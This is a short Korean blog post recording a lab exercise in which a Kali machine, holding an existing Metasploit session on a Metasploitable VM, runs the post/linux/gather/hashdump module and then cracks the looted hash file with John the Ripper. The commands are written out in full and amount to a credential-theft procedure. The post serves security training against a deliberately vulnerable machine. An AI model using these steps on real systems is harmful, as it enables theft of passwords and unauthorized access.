Kali Linux/Metasploitable
세션을 이용한 post/hashdump (패스워드 크랙) 실습
JoGeun
2018. 10. 21. 13:22
*세션을 이용한 post/hashdump(패스워드 크랙) 실습
Attacker : kali
Victim : metasploitable
※Victim에 여러 취약점 공격을 통하여 Session이 연결되어 있어야함
(kali)
msf > sessions
msf > use post/linux/gather/hashdump
msf > show options
msf > set session 1
msf > show options
msf > exploit
msf > exit -y
#john /root/.msf4/loot/20180105141842_default_192.168.10.134_linux.hashes_958442.txt
툴을 이용하여 해당 파일의 암호를 크랙을 하면 된다.